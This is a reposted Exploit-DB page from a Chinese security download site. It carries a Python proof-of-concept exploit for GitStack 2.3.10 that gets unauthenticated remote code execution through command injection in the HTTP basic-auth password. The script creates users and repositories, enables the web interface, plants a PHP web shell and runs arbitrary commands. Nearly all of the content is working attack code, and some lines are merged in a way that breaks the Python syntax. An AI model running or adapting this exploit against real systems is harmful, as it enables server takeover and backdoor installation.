ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全网络安全工具 → GitStack 2.3.10 – 越权远程执行代码
GitStack 2.3.10 – 越权远程执行代码

GitStack 2.3.10 – 越权远程执行代码

评分:
下载地址
  • 软件介绍
  • 软件截图
  • 同类推荐
  • 相关文章

软件Tags: [db:tag]

EDB-ID: 43777 AuthorKacper Szurek Published2018-01-18
CVE: N/A TypeWebapps PlatformPHP
Aliases: N/A Advisory/SourceLink Tags: N/A
E-DB VerifiedGitStack 2.3.10 - 越权远程执行代码 ExploitGitStack 2.3.10 - 越权远程执行代码 Download  View Raw Vulnerable App: N/A

 

GitStack 2.3.10 - 越权远程执行代码

# Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution
# Date: 18.01.2018
# Software Link: https://gitstack.com/  # Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
#   
#1. Description
#  
#$_SERVER['PHP_AUTH_PW'] is directly passed to exec function.
#
#https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html
# 
#2. Proof of Concept  #
import requests
from requests.auth import HTTPBasicAuth
import os
import sys
 
ip = '192.168.1.102'
 
# What command you want to execute
command = "whoami"
 
repository = 'rce'  username = 'rce'
password = 'rce'
csrf_token = 'token'
 
user_list = []
 
print "[+] Get user list"
try:
    r = requests.get("http://{}/rest/user/".format(ip))
    user_list = r.json()
    user_list.remove('everyone')
except:
    pass
 
if len(user_list) > 0:
    username = user_list[0]
    print "[+] Found user {}".format(username)
else:
    r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password})
    print "[+] Create user"
     
    if not "User created" in r.text and not "User already exist" in r.text:
        print "[-] Cannot create user"  os._exit(0)
 
r = requests.get("http://{}/rest/settings/general/webinterface/".format(ip))
if "true" in r.text:
    print "[+] Web repository already enabled"
else:
    print "[+] Enable web repository"
    r = requests.put("http://{}/rest/settings/general/webinterface/".format(ip), data='{"enabled" : "true"}')
    if not "Web interface successfully enabled" in r.text:
        print "[-] Cannot enable web interface"
        os._exit(0)
 
print "[+] Get repositories list"
r = requests.get("http://{}/rest/repository/".format(ip))
repository_list = r.json()
 
if len(repository_list) > 0:
    repository = repository_list[0]['name']
    print "[+] Found repository {}".format(repository)
else:
    print "[+] Create repository"
 
    r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token})
    if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text:
        print "[-] Cannot create repository"  os._exit(0)  print "[+] Add user to repository"
r = requests.post("http://{}/rest/repository/{}/user/{}/".format(ip, repository, username))
 
if not "added to" in r.text and not "has already" in r.text:
    print "[-] Cannot add user to repository"
    os._exit(0) 
 
print "[+] Disable access for anyone"
r = requests.delete("http://{}/rest/repository/{}/user/{}/".format(ip, repository, "everyone"))
 
if not "everyone removed from rce" in r.text and not "not in list" in r.text:
    print "[-] Cannot remove access for anyone"
    os._exit(0) 
 
print "[+] Create backdoor in PHP"
r = requests.get('http://{}/web/index.php?p={}.git&a=summary'.format(ip, repository), auth=HTTPBasicAuth(username, 'p && echo "<?php system($_POST[\'a\']); ?>" > c:\GitStack\gitphp\exploit.php'))
print r.text.encode(sys.stdout.encoding, errors='replace')
 
print "[+] Execute command"
r = requests.post("http://{}/web/exploit.php".format(ip), data={'a' : command})
print r.text.encode(sys.stdout.encoding, errors='replace')

展开内容

软件截图

下载地址

  • PC版

推荐文章

用户评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 蜀ICP备19039426号-2| 蜀ICP备19039426号-2

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网